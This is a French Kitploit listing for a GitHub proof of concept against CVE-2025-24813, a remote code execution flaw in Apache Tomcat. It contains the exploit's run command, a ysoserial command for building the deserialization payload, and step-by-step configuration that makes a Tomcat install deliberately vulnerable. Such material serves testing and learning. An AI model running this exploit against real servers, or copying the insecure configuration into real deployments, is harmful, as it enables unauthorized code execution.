Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24813-POC — CVE-2025-24813 Apache Tomcat RCE Preuve de concept (PoC) | Kitploit
Outils/GitHubGitHub/alaatk/cve-2025-24813-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubalaatk/cve-2025-24813-poc

CVE-2025-24813-POC

CVE-2025-24813 Apache Tomcat RCE Preuve de concept (PoC)

Voir le dépôt
41il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24813 Apache Tomcat RCE PoC

PoC pour CVE-2025-24813, une vulnérabilité d'exécution de code à distance (RCE) dans Apache Tomcat.

Important : Ce PoC est destiné uniquement à tester vos propres environnements ou à des fins éducatives. Toute utilisation de ce PoC pour exploiter des systèmes sans autorisation appropriée est interdite et peut être illégale. Les créateurs et distributeurs de ce PoC ne sont pas responsables de toute utilisation abusive ou des dommages causés. Obtenez toujours une autorisation explicite avant de tester un environnement qui ne vous appartient pas.


Utilisation

root@kitploit:~
python3 CVE-2025-24813.py --url <target_url>

Configuration de l'environnement

Charge utile de test

Le code contient déjà une charge utile encodée en base64 générée avec ysoserial (https://github.com/frohoff/ysoserial) qui crée un fichier RCE-success dans /tmp comme suit :

root@kitploit:~
java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/RCE-success" | base64 -w 0

Configuration d'une installation Tomcat vulnérable

  1. Activer l'accès PUT / Écriture

    Modifiez $CATALINA_HOME/conf/web.xml pour ajouter un paramètre readonly sous la section du nom de servlet default et définissez-le sur false.

    root@kitploit:~
        <servlet>
            <servlet-name>default</servlet-name>
            <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
            <init-param>
                <param-name>debug</param-name>
                <param-value>0</param-value>
            </init-param>
            <init-param>
                <param-name>listings</param-name>
                <param-value>false</param-value>
            </init-param>
            <init-param>
              <param-name>readonly</param-name>
              <param-value>false</param-value>
            </init-param>
            <load-on-startup>1</load-on-startup>
        </servlet>
    
  2. Activer la persistance de session

    • Partie a) Modifiez $CATALINA_HOME/conf/context.xml et ajoutez le paramètre suivant.
    root@kitploit:~
        <Manager className="org.apache.catalina.session.PersistentManager">
          <Store className="org.apache.catalina.session.FileStore" />
        </Manager>
    
    • Partie b) Modifiez $CATALINA_HOME/webapps/ROOT/index.jsp et assurez-vous que le paramètre par défaut pour la session n'est pas "false" ou supprimez-le simplement.
    root@kitploit:~
     <%@ page session="true" pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>
    

    OU

    root@kitploit:~
     <%@ page pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>
    
  3. Téléchargez les dépendances dans $CATALINA_HOME/lib/

root@kitploit:~
cd $CATALINA_HOME/lib/
wget https[:]//repo1.maven[.]org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
wget https[:]//repo1.maven[.]org/maven2/commons-beanutils/commons-beanutils/1.9.2/commons-beanutils-1.9.2.jar
wget https[:]//repo1.maven[.]org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar

Résultat

  • Exploitation réussie :
root@kitploit:~
[+] Exploit most likely succeeded
  • Exploitation échouée :
root@kitploit:~
[-] Exploit failed with status code: {status_code}, instead of 500,409

Demo

Télécharger l’outil